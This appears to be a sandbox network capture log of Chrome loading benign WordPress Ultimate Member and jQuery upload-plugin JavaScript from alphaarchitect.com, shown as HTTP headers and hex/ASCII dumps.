                                                                                                                                                                                                                                                                        2024-12-20 12:44:55 UTC416INData Raw: 76 6f 69 64 20 30 3d 3d 3d 74 26 26 22 22 21 3d 3d 74 7c 7c 28 69 2e 66 69 6e 64 28 27 6f 70 74 69 6f 6e 5b 76 61 6c 75 65 21 3d 22 22 5d 27 29 2e 72 65 6d 6f 76 65 28 29 2c 69 2e 76 61 6c 28 22 22 29 2e 74 72 69 67 67 65 72 28 22 63 68 61 6e 67 65 22 29 29 7d 29 2c 6a 51 75 65 72 79 28 27 73 65 6c 65 63 74 5b 6e 61 6d 65 3d 22 27 2b 72 2b 27 22 5d 27 29 2e 74 72 69 67 67 65 72 28 22 63 68 61 6e 67 65 22 29 7d 29 2c 6a 51 75 65 72 79 28 64 6f 63 75 6d 65 6e 74 2e 62 6f 64 79 29 2e 6f 6e 28 22 63 6c 69 63 6b 22 2c 22 2e 75 6d 2d 74 6f 67 67 6c 65 2d 70 61 73 73 77 6f 72 64 22 2c 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 65 3d 6a 51 75 65 72 79 28 74 68 69 73 29 2e 63 6c 6f 73 65 73 74 28 22 2e 75 6d 2d 66 69 65 6c 64 2d 61 72 65 61 2d 70 61 73 73 77 6f
                                                                                                                                                                                                                                                                        Data Ascii: void 0===t&&""!==t||(i.find('option[value!=""]').remove(),i.val("").trigger("change"))}),jQuery('select[name="'+r+'"]').trigger("change")}),jQuery(document.body).on("click",".um-toggle-password",function(){var e=jQuery(this).closest(".um-field-area-passwo


                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                        80192.168.2.449838141.193.213.104435808C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                        2024-12-20 12:44:55 UTC795OUTGET /wp-content/plugins/ultimate-member/assets/js/um-profile.min.js?ver=2.9.1 HTTP/1.1
                                                                                                                                                                                                                                                                        Host: alphaarchitect.com
                                                                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                                                                        sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                        sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                        sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                        Accept: */*
                                                                                                                                                                                                                                                                        Sec-Fetch-Site: same-origin
                                                                                                                                                                                                                                                                        Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                                        Sec-Fetch-Dest: script
                                                                                                                                                                                                                                                                        Referer: https://alphaarchitect.com/2024/12/long-term-expected-returns/
                                                                                                                                                                                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                        Cookie: __cf_bm=oaZHLCCX_5HyyCRj6hqzB4N2tkR7Es2q56thNCJY11g-1734698678-1.0.1.1-NyEi2UfzCQmWt3PM0KFzSa3bC5QYScS.bxwPSWdPnZmO6XiISm8kmG52t7iL9fVSeIqHftu3Z3ifTzGE2VxBlg
                                                                                                                                                                                                                                                                        2024-12-20 12:44:55 UTC491INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                        Date: Fri, 20 Dec 2024 12:44:55 GMT
                                                                                                                                                                                                                                                                        Content-Type: application/javascript
                                                                                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                                                                                                        Last-Modified: Fri, 15 Nov 2024 17:23:51 GMT
                                                                                                                                                                                                                                                                        ETag: W/"673783a7-cdc"
                                                                                                                                                                                                                                                                        Cache-Control: public, max-age=31536000
                                                                                                                                                                                                                                                                        Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                                                        CF-Cache-Status: HIT
                                                                                                                                                                                                                                                                        Age: 147812
                                                                                                                                                                                                                                                                        Server: cloudflare
                                                                                                                                                                                                                                                                        CF-RAY: 8f4fb9febf9b428b-EWR
                                                                                                                                                                                                                                                                        alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                                        2024-12-20 12:44:55 UTC878INData Raw: 63 64 63 0d 0a 6a 51 75 65 72 79 28 64 6f 63 75 6d 65 6e 74 29 2e 72 65 61 64 79 28 66 75 6e 63 74 69 6f 6e 28 29 7b 6a 51 75 65 72 79 28 22 2e 75 6d 2d 70 72 6f 66 69 6c 65 2e 75 6d 2d 76 69 65 77 69 6e 67 20 2e 75 6d 2d 70 72 6f 66 69 6c 65 2d 62 6f 64 79 20 2e 75 6d 2d 72 6f 77 22 29 2e 65 61 63 68 28 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 65 3d 6a 51 75 65 72 79 28 74 68 69 73 29 3b 30 3d 3d 65 2e 66 69 6e 64 28 22 2e 75 6d 2d 66 69 65 6c 64 22 29 2e 6c 65 6e 67 74 68 26 26 28 65 2e 70 72 65 76 28 22 2e 75 6d 2d 72 6f 77 2d 68 65 61 64 69 6e 67 22 29 2e 72 65 6d 6f 76 65 28 29 2c 65 2e 72 65 6d 6f 76 65 28 29 29 7d 29 2c 6a 51 75 65 72 79 28 22 2e 75 6d 2d 70 72 6f 66 69 6c 65 2e 75 6d 2d 76 69 65 77 69 6e 67 20 2e 75 6d 2d 70 72 6f 66 69 6c 65
                                                                                                                                                                                                                                                                        Data Ascii: cdcjQuery(document).ready(function(){jQuery(".um-profile.um-viewing .um-profile-body .um-row").each(function(){var e=jQuery(this);0==e.find(".um-field").length&&(e.prev(".um-row-heading").remove(),e.remove())}),jQuery(".um-profile.um-viewing .um-profile
                                                                                                                                                                                                                                                                        2024-12-20 12:44:55 UTC1369INData Raw: 79 29 2e 6f 6e 28 22 63 6c 69 63 6b 22 2c 22 2e 75 6d 2d 70 68 6f 74 6f 2d 6d 6f 64 61 6c 22 2c 66 75 6e 63 74 69 6f 6e 28 65 29 7b 65 2e 70 72 65 76 65 6e 74 44 65 66 61 75 6c 74 28 29 3b 65 3d 6a 51 75 65 72 79 28 74 68 69 73 29 2e 61 74 74 72 28 22 64 61 74 61 2d 73 72 63 22 29 3b 72 65 74 75 72 6e 20 75 6d 5f 6e 65 77 5f 6d 6f 64 61 6c 28 22 75 6d 5f 76 69 65 77 5f 70 68 6f 74 6f 22 2c 22 66 69 74 22 2c 21 30 2c 65 29 2c 21 31 7d 29 2c 6a 51 75 65 72 79 28 64 6f 63 75 6d 65 6e 74 2e 62 6f 64 79 29 2e 6f 6e 28 22 63 6c 69 63 6b 22 2c 22 2e 75 6d 2d 72 65 73 65 74 2d 70 72 6f 66 69 6c 65 2d 70 68 6f 74 6f 22 2c 66 75 6e 63 74 69 6f 6e 28 65 29 7b 72 65 74 75 72 6e 20 6a 51 75 65 72 79 28 22 2e 75 6d 2d 70 72 6f 66 69 6c 65 2d 70 68 6f 74 6f 2d 69 6d 67
                                                                                                                                                                                                                                                                        Data Ascii: y).on("click",".um-photo-modal",function(e){e.preventDefault();e=jQuery(this).attr("data-src");return um_new_modal("um_view_photo","fit",!0,e),!1}),jQuery(document.body).on("click",".um-reset-profile-photo",function(e){return jQuery(".um-profile-photo-img
                                                                                                                                                                                                                                                                        2024-12-20 12:44:55 UTC1052INData Raw: 28 22 68 74 6d 6c 22 29 3b 6c 65 74 20 65 3d 74 2d 6a 51 75 65 72 79 28 74 68 69 73 29 2e 76 61 6c 28 29 2e 6c 65 6e 67 74 68 3b 65 3d 28 65 3d 31 3d 3d 3d 70 61 72 73 65 49 6e 74 28 72 29 3f 74 2d 6a 51 75 65 72 79 28 74 68 69 73 29 2e 76 61 6c 28 29 2e 72 65 70 6c 61 63 65 28 2f 28 3c 28 5b 5e 3e 5d 2b 29 3e 29 2f 67 69 2c 22 22 29 2e 6c 65 6e 67 74 68 3a 65 29 3c 30 3f 30 3a 65 2c 6a 51 75 65 72 79 28 22 73 70 61 6e 2e 75 6d 2d 6d 65 74 61 2d 62 69 6f 2d 63 68 61 72 61 63 74 65 72 20 73 70 61 6e 2e 75 6d 2d 62 69 6f 2d 6c 69 6d 69 74 22 29 2e 74 65 78 74 28 65 29 3b 72 3d 65 3c 35 3f 22 72 65 64 22 3a 22 22 3b 6a 51 75 65 72 79 28 22 73 70 61 6e 2e 75 6d 2d 6d 65 74 61 2d 62 69 6f 2d 63 68 61 72 61 63 74 65 72 22 29 2e 63 73 73 28 22 63 6f 6c 6f 72 22
                                                                                                                                                                                                                                                                        Data Ascii: ("html");let e=t-jQuery(this).val().length;e=(e=1===parseInt(r)?t-jQuery(this).val().replace(/(<([^>]+)>)/gi,"").length:e)<0?0:e,jQuery("span.um-meta-bio-character span.um-bio-limit").text(e);r=e<5?"red":"";jQuery("span.um-meta-bio-character").css("color"
                                                                                                                                                                                                                                                                        2024-12-20 12:44:55 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                        Data Ascii: 0


                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                        81192.168.2.449839141.193.213.104435808C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                        2024-12-20 12:44:55 UTC795OUTGET /wp-content/plugins/ultimate-member/assets/js/um-account.min.js?ver=2.9.1 HTTP/1.1
                                                                                                                                                                                                                                                                        Host: alphaarchitect.com
                                                                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                                                                        sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                        sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                        sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                        Accept: */*
                                                                                                                                                                                                                                                                        Sec-Fetch-Site: same-origin
                                                                                                                                                                                                                                                                        Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                                        Sec-Fetch-Dest: script
                                                                                                                                                                                                                                                                        Referer: https://alphaarchitect.com/2024/12/long-term-expected-returns/
                                                                                                                                                                                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                        Cookie: __cf_bm=oaZHLCCX_5HyyCRj6hqzB4N2tkR7Es2q56thNCJY11g-1734698678-1.0.1.1-NyEi2UfzCQmWt3PM0KFzSa3bC5QYScS.bxwPSWdPnZmO6XiISm8kmG52t7iL9fVSeIqHftu3Z3ifTzGE2VxBlg
                                                                                                                                                                                                                                                                        2024-12-20 12:44:55 UTC491INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                        Date: Fri, 20 Dec 2024 12:44:55 GMT
                                                                                                                                                                                                                                                                        Content-Type: application/javascript
                                                                                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                                                                                                        Last-Modified: Fri, 15 Nov 2024 17:23:51 GMT
                                                                                                                                                                                                                                                                        ETag: W/"673783a7-b4e"
                                                                                                                                                                                                                                                                        Cache-Control: public, max-age=31536000
                                                                                                                                                                                                                                                                        Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                                                        CF-Cache-Status: HIT
                                                                                                                                                                                                                                                                        Age: 147812
                                                                                                                                                                                                                                                                        Server: cloudflare
                                                                                                                                                                                                                                                                        CF-RAY: 8f4fb9ff3bbade98-EWR
                                                                                                                                                                                                                                                                        alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                                        2024-12-20 12:44:55 UTC878INData Raw: 62 34 65 0d 0a 6a 51 75 65 72 79 28 64 6f 63 75 6d 65 6e 74 29 2e 72 65 61 64 79 28 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 74 3d 6a 51 75 65 72 79 28 22 2e 75 6d 2d 61 63 63 6f 75 6e 74 2d 6d 61 69 6e 22 29 2e 61 74 74 72 28 22 64 61 74 61 2d 63 75 72 72 65 6e 74 5f 74 61 62 22 29 3b 74 26 26 28 6a 51 75 65 72 79 28 27 2e 75 6d 2d 61 63 63 6f 75 6e 74 2d 74 61 62 5b 64 61 74 61 2d 74 61 62 3d 22 27 2b 74 2b 27 22 5d 27 29 2e 73 68 6f 77 28 29 2c 6a 51 75 65 72 79 28 22 2e 75 6d 2d 61 63 63 6f 75 6e 74 2d 74 61 62 3a 6e 6f 74 28 3a 76 69 73 69 62 6c 65 29 22 29 2e 66 69 6e 64 28 22 69 6e 70 75 74 2c 20 73 65 6c 65 63 74 2c 20 74 65 78 74 61 72 65 61 22 29 2e 6e 6f 74 28 22 3a 64 69 73 61 62 6c 65 64 22 29 2e 61 64 64 43 6c 61 73 73 28 22 75 6d 5f 61
                                                                                                                                                                                                                                                                        Data Ascii: b4ejQuery(document).ready(function(){var t=jQuery(".um-account-main").attr("data-current_tab");t&&(jQuery('.um-account-tab[data-tab="'+t+'"]').show(),jQuery(".um-account-tab:not(:visible)").find("input, select, textarea").not(":disabled").addClass("um_a
                                                                                                                                                                                                                                                                        2024-12-20 12:44:55 UTC1369INData Raw: 74 69 76 65 3a 64 69 73 61 62 6c 65 64 22 29 2e 72 65 6d 6f 76 65 43 6c 61 73 73 28 22 75 6d 5f 61 63 63 6f 75 6e 74 5f 69 6e 61 63 74 69 76 65 22 29 2e 70 72 6f 70 28 22 64 69 73 61 62 6c 65 64 22 2c 21 31 29 2e 61 74 74 72 28 22 64 69 73 61 62 6c 65 64 22 2c 21 31 29 2c 6a 51 75 65 72 79 28 22 2e 75 6d 2d 61 63 63 6f 75 6e 74 2d 74 61 62 3a 6e 6f 74 28 3a 76 69 73 69 62 6c 65 29 22 29 2e 66 69 6e 64 28 22 69 6e 70 75 74 2c 20 73 65 6c 65 63 74 2c 20 74 65 78 74 61 72 65 61 22 29 2e 6e 6f 74 28 22 3a 64 69 73 61 62 6c 65 64 22 29 2e 61 64 64 43 6c 61 73 73 28 22 75 6d 5f 61 63 63 6f 75 6e 74 5f 69 6e 61 63 74 69 76 65 22 29 2e 70 72 6f 70 28 22 64 69 73 61 62 6c 65 64 22 2c 21 30 29 2e 61 74 74 72 28 22 64 69 73 61 62 6c 65 64 22 2c 21 30 29 2c 6a 51 75
                                                                                                                                                                                                                                                                        Data Ascii: tive:disabled").removeClass("um_account_inactive").prop("disabled",!1).attr("disabled",!1),jQuery(".um-account-tab:not(:visible)").find("input, select, textarea").not(":disabled").addClass("um_account_inactive").prop("disabled",!0).attr("disabled",!0),jQu
                                                                                                                                                                                                                                                                        2024-12-20 12:44:55 UTC654INData Raw: 6d 2d 61 63 63 6f 75 6e 74 2d 73 69 64 65 20 6c 69 20 61 5b 64 61 74 61 2d 74 61 62 3d 22 27 2b 74 2b 27 22 5d 27 29 2e 61 64 64 43 6c 61 73 73 28 22 63 75 72 72 65 6e 74 22 29 2c 77 70 2e 68 6f 6f 6b 73 2e 64 6f 41 63 74 69 6f 6e 28 22 75 6d 5f 61 66 74 65 72 5f 61 63 63 6f 75 6e 74 5f 74 61 62 5f 63 68 61 6e 67 65 64 22 2c 74 29 2c 21 31 7d 29 2c 6a 51 75 65 72 79 28 64 6f 63 75 6d 65 6e 74 2e 62 6f 64 79 29 2e 6f 6e 28 22 63 6c 69 63 6b 22 2c 22 2e 75 6d 2d 72 65 71 75 65 73 74 2d 62 75 74 74 6f 6e 22 2c 66 75 6e 63 74 69 6f 6e 28 74 29 7b 74 2e 70 72 65 76 65 6e 74 44 65 66 61 75 6c 74 28 29 3b 76 61 72 20 61 2c 65 3d 6a 51 75 65 72 79 28 74 68 69 73 29 2e 64 61 74 61 28 22 61 63 74 69 6f 6e 22 29 2c 74 3d 6a 51 75 65 72 79 28 22 23 22 2b 65 29 2e 76
                                                                                                                                                                                                                                                                        Data Ascii: m-account-side li a[data-tab="'+t+'"]').addClass("current"),wp.hooks.doAction("um_after_account_tab_changed",t),!1}),jQuery(document.body).on("click",".um-request-button",function(t){t.preventDefault();var a,e=jQuery(this).data("action"),t=jQuery("#"+e).v
                                                                                                                                                                                                                                                                        2024-12-20 12:44:55 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                        Data Ascii: 0


                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                        82192.168.2.449840141.193.213.114435808C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                        2024-12-20 12:44:55 UTC618OUTGET /wp-content/cache/min/1/wp-content/plugins/ultimate-member/assets/libs/fileupload/fileupload.js?ver=1733842125 HTTP/1.1
                                                                                                                                                                                                                                                                        Host: alphaarchitect.com
                                                                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                        Accept: */*
                                                                                                                                                                                                                                                                        Sec-Fetch-Site: none
                                                                                                                                                                                                                                                                        Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                                                        Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                        Cookie: __cf_bm=oaZHLCCX_5HyyCRj6hqzB4N2tkR7Es2q56thNCJY11g-1734698678-1.0.1.1-NyEi2UfzCQmWt3PM0KFzSa3bC5QYScS.bxwPSWdPnZmO6XiISm8kmG52t7iL9fVSeIqHftu3Z3ifTzGE2VxBlg
                                                                                                                                                                                                                                                                        2024-12-20 12:44:56 UTC492INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                        Date: Fri, 20 Dec 2024 12:44:55 GMT
                                                                                                                                                                                                                                                                        Content-Type: application/javascript
                                                                                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                                                                                                        Last-Modified: Tue, 10 Dec 2024 14:48:45 GMT
                                                                                                                                                                                                                                                                        ETag: W/"675854cd-258c"
                                                                                                                                                                                                                                                                        Cache-Control: public, max-age=31536000
                                                                                                                                                                                                                                                                        Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                                                        CF-Cache-Status: HIT
                                                                                                                                                                                                                                                                        Age: 147812
                                                                                                                                                                                                                                                                        Server: cloudflare
                                                                                                                                                                                                                                                                        CF-RAY: 8f4fba008ad14339-EWR
                                                                                                                                                                                                                                                                        alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                                        2024-12-20 12:44:56 UTC877INData Raw: 32 35 38 63 0d 0a 2f 2a 21 0a 20 2a 20 6a 51 75 65 72 79 20 55 70 6c 6f 61 64 20 46 69 6c 65 20 50 6c 75 67 69 6e 0a 20 2a 20 76 65 72 73 69 6f 6e 3a 20 33 2e 31 2e 32 0a 20 2a 20 40 72 65 71 75 69 72 65 73 20 6a 51 75 65 72 79 20 76 31 2e 35 20 6f 72 20 6c 61 74 65 72 20 26 20 66 6f 72 6d 20 70 6c 75 67 69 6e 0a 20 2a 20 43 6f 70 79 72 69 67 68 74 20 28 63 29 20 32 30 31 33 20 52 61 76 69 73 68 61 6e 6b 65 72 20 4b 75 73 75 6d 61 0a 20 2a 20 68 74 74 70 3a 2f 2f 68 61 79 61 67 65 65 6b 2e 63 6f 6d 2f 0a 20 2a 2f 0a 28 66 75 6e 63 74 69 6f 6e 28 62 29 7b 69 66 28 62 2e 66 6e 2e 61 6a 61 78 46 6f 72 6d 3d 3d 75 6e 64 65 66 69 6e 65 64 29 7b 7d 76 61 72 20 61 3d 7b 7d 3b 61 2e 66 69 6c 65 61 70 69 3d 62 28 22 3c 69 6e 70 75 74 20 74 79 70 65 3d 27 66 69 6c
                                                                                                                                                                                                                                                                        Data Ascii: 258c/*! * jQuery Upload File Plugin * version: 3.1.2 * @requires jQuery v1.5 or later & form plugin * Copyright (c) 2013 Ravishanker Kusuma * http://hayageek.com/ */(function(b){if(b.fn.ajaxForm==undefined){}var a={};a.fileapi=b("<input type='fil
                                                                                                                                                                                                                                                                        2024-12-20 12:44:56 UTC1369INData Raw: 76 2c 73 2c 75 29 7b 7d 2c 64 65 6c 65 74 65 43 61 6c 6c 62 61 63 6b 3a 21 31 2c 61 66 74 65 72 55 70 6c 6f 61 64 41 6c 6c 3a 21 31 2c 75 70 6c 6f 61 64 42 75 74 74 6f 6e 43 6c 61 73 73 3a 22 75 70 6c 6f 61 64 22 2c 64 72 61 67 44 72 6f 70 53 74 72 3a 22 22 2c 61 62 6f 72 74 53 74 72 3a 22 41 62 6f 72 74 22 2c 63 61 6e 63 65 6c 53 74 72 3a 22 43 61 6e 63 65 6c 22 2c 64 65 6c 65 74 65 6c 53 74 72 3a 22 44 65 6c 65 74 65 22 2c 64 6f 6e 65 53 74 72 3a 22 44 6f 6e 65 22 2c 6d 75 6c 74 69 44 72 61 67 45 72 72 6f 72 53 74 72 3a 22 4d 75 6c 74 69 70 6c 65 20 46 69 6c 65 20 44 72 61 67 20 26 61 6d 70 3b 20 44 72 6f 70 20 69 73 20 6e 6f 74 20 61 6c 6c 6f 77 65 64 2e 22 2c 65 78 74 45 72 72 6f 72 53 74 72 3a 22 22 2c 73 69 7a 65 45 72 72 6f 72 53 74 72 3a 22 22 2c
                                                                                                                                                                                                                                                                        Data Ascii: v,s,u){},deleteCallback:!1,afterUploadAll:!1,uploadButtonClass:"upload",dragDropStr:"",abortStr:"Abort",cancelStr:"Cancel",deletelStr:"Delete",doneStr:"Done",multiDragErrorStr:"Multiple File Drag &amp; Drop is not allowed.",extErrorStr:"",sizeErrorStr:"",
                                                                                                                                                                                                                                                                        2024-12-20 12:44:56 UTC1369INData Raw: 74 65 72 55 70 6c 6f 61 64 41 6c 6c 28 6d 29 3b 67 3d 21 31 7d 65 6c 73 65 7b 77 69 6e 64 6f 77 2e 73 65 74 54 69 6d 65 6f 75 74 28 73 2c 31 30 30 29 7d 7d 29 28 29 7d 7d 66 75 6e 63 74 69 6f 6e 20 66 28 77 2c 75 2c 76 29 7b 76 2e 6f 6e 28 22 64 72 61 67 65 6e 74 65 72 22 2c 66 75 6e 63 74 69 6f 6e 28 73 29 7b 73 2e 73 74 6f 70 50 72 6f 70 61 67 61 74 69 6f 6e 28 29 3b 73 2e 70 72 65 76 65 6e 74 44 65 66 61 75 6c 74 28 29 3b 62 28 74 68 69 73 29 2e 63 73 73 28 22 62 6f 72 64 65 72 22 2c 22 32 70 78 20 64 61 73 68 65 64 20 23 64 64 64 22 29 7d 29 3b 76 2e 6f 6e 28 22 64 72 61 67 6f 76 65 72 22 2c 66 75 6e 63 74 69 6f 6e 28 73 29 7b 73 2e 73 74 6f 70 50 72 6f 70 61 67 61 74 69 6f 6e 28 29 3b 73 2e 70 72 65 76 65 6e 74 44 65 66 61 75 6c 74 28 29 7d 29 3b 76
                                                                                                                                                                                                                                                                        Data Ascii: terUploadAll(m);g=!1}else{window.setTimeout(s,100)}})()}}function f(w,u,v){v.on("dragenter",function(s){s.stopPropagation();s.preventDefault();b(this).css("border","2px dashed #ddd")});v.on("dragover",function(s){s.stopPropagation();s.preventDefault()});v
                                                                                                                                                                                                                                                                        2024-12-20 12:44:56 UTC1369INData Raw: 2d 62 6c 6f 63 6b 27 3e 22 2b 48 2e 65 78 74 45 72 72 6f 72 53 74 72 2b 22 3c 2f 64 69 76 3e 22 29 2e 61 70 70 65 6e 64 54 6f 28 42 2e 65 72 72 6f 72 4c 6f 67 29 7d 63 6f 6e 74 69 6e 75 65 7d 69 66 28 48 2e 6d 61 78 46 69 6c 65 53 69 7a 65 21 3d 2d 31 26 26 75 5b 43 5d 2e 73 69 7a 65 3e 48 2e 6d 61 78 46 69 6c 65 53 69 7a 65 29 7b 69 66 28 48 2e 73 68 6f 77 45 72 72 6f 72 29 7b 62 28 22 3c 64 69 76 20 63 6c 61 73 73 3d 27 75 6d 2d 65 72 72 6f 72 2d 62 6c 6f 63 6b 27 3e 22 2b 48 2e 73 69 7a 65 45 72 72 6f 72 53 74 72 2b 22 3c 2f 64 69 76 3e 22 29 2e 61 70 70 65 6e 64 54 6f 28 42 2e 65 72 72 6f 72 4c 6f 67 29 7d 63 6f 6e 74 69 6e 75 65 7d 69 66 28 48 2e 6d 61 78 46 69 6c 65 43 6f 75 6e 74 21 3d 2d 31 26 26 42 2e 73 65 6c 65 63 74 65 64 46 69 6c 65 73 3e 3d
                                                                                                                                                                                                                                                                        Data Ascii: -block'>"+H.extErrorStr+"</div>").appendTo(B.errorLog)}continue}if(H.maxFileSize!=-1&&u[C].size>H.maxFileSize){if(H.showError){b("<div class='um-error-block'>"+H.sizeErrorStr+"</div>").appendTo(B.errorLog)}continue}if(H.maxFileCount!=-1&&B.selectedFiles>=
                                                                                                                                                                                                                                                                        2024-12-20 12:44:56 UTC1369INData Raw: 29 7d 7d 66 75 6e 63 74 69 6f 6e 20 71 28 79 2c 42 2c 44 2c 75 29 7b 76 61 72 20 41 3d 22 61 6a 61 78 2d 75 70 6c 6f 61 64 2d 69 64 2d 22 2b 28 6e 65 77 20 44 61 74 65 28 29 2e 67 65 74 54 69 6d 65 28 29 29 3b 76 61 72 20 77 3d 62 28 22 3c 66 6f 72 6d 20 6d 65 74 68 6f 64 3d 27 22 2b 44 2e 6d 65 74 68 6f 64 2b 22 27 20 61 63 74 69 6f 6e 3d 27 22 2b 44 2e 75 72 6c 2b 22 27 20 65 6e 63 74 79 70 65 3d 27 22 2b 44 2e 65 6e 63 74 79 70 65 2b 22 27 3e 3c 2f 66 6f 72 6d 3e 22 29 3b 76 61 72 20 76 3d 22 3c 69 6e 70 75 74 20 74 79 70 65 3d 27 66 69 6c 65 27 20 69 64 3d 27 22 2b 41 2b 22 27 20 6e 61 6d 65 3d 27 22 2b 44 2e 66 69 6c 65 4e 61 6d 65 2b 22 27 2f 3e 22 3b 69 66 28 44 2e 6d 75 6c 74 69 70 6c 65 29 7b 69 66 28 44 2e 66 69 6c 65 4e 61 6d 65 2e 69 6e 64 65
                                                                                                                                                                                                                                                                        Data Ascii: )}}function q(y,B,D,u){var A="ajax-upload-id-"+(new Date().getTime());var w=b("<form method='"+D.method+"' action='"+D.url+"' enctype='"+D.enctype+"'></form>");var v="<input type='file' id='"+A+"' name='"+D.fileName+"'/>";if(D.multiple){if(D.fileName.inde
                                                                                                                                                                                                                                                                        2024-12-20 12:44:56 UTC1369INData Raw: 69 6e 67 3a 30 7d 29 3b 76 61 72 20 43 3d 62 28 75 29 2e 77 69 64 74 68 28 29 2b 31 30 3b 69 66 28 43 3d 3d 31 30 29 7b 43 3d 31 32 30 7d 76 61 72 20 78 3d 75 2e 68 65 69 67 68 74 28 29 2b 31 30 3b 69 66 28 78 3d 3d 31 30 29 7b 78 3d 33 35 7d 75 2e 63 73 73 28 7b 70 6f 73 69 74 69 6f 6e 3a 22 72 65 6c 61 74 69 76 65 22 2c 6f 76 65 72 66 6c 6f 77 3a 22 68 69 64 64 65 6e 22 2c 63 75 72 73 6f 72 3a 22 64 65 66 61 75 6c 74 22 7d 29 3b 7a 2e 63 73 73 28 7b 70 6f 73 69 74 69 6f 6e 3a 22 61 62 73 6f 6c 75 74 65 22 2c 63 75 72 73 6f 72 3a 22 70 6f 69 6e 74 65 72 22 2c 74 6f 70 3a 22 30 70 78 22 2c 77 69 64 74 68 3a 27 31 30 30 25 27 2c 68 65 69 67 68 74 3a 27 33 34 70 78 27 2c 6c 65 66 74 3a 22 30 70 78 22 2c 22 7a 2d 69 6e 64 65 78 22 3a 22 31 30 30 22 2c 6f 70
                                                                                                                                                                                                                                                                        Data Ascii: ing:0});var C=b(u).width()+10;if(C==10){C=120}var x=u.height()+10;if(x==10){x=35}u.css({position:"relative",overflow:"hidden",cursor:"default"});z.css({position:"absolute",cursor:"pointer",top:"0px",width:'100%',height:'34px',left:"0px","z-index":"100",op
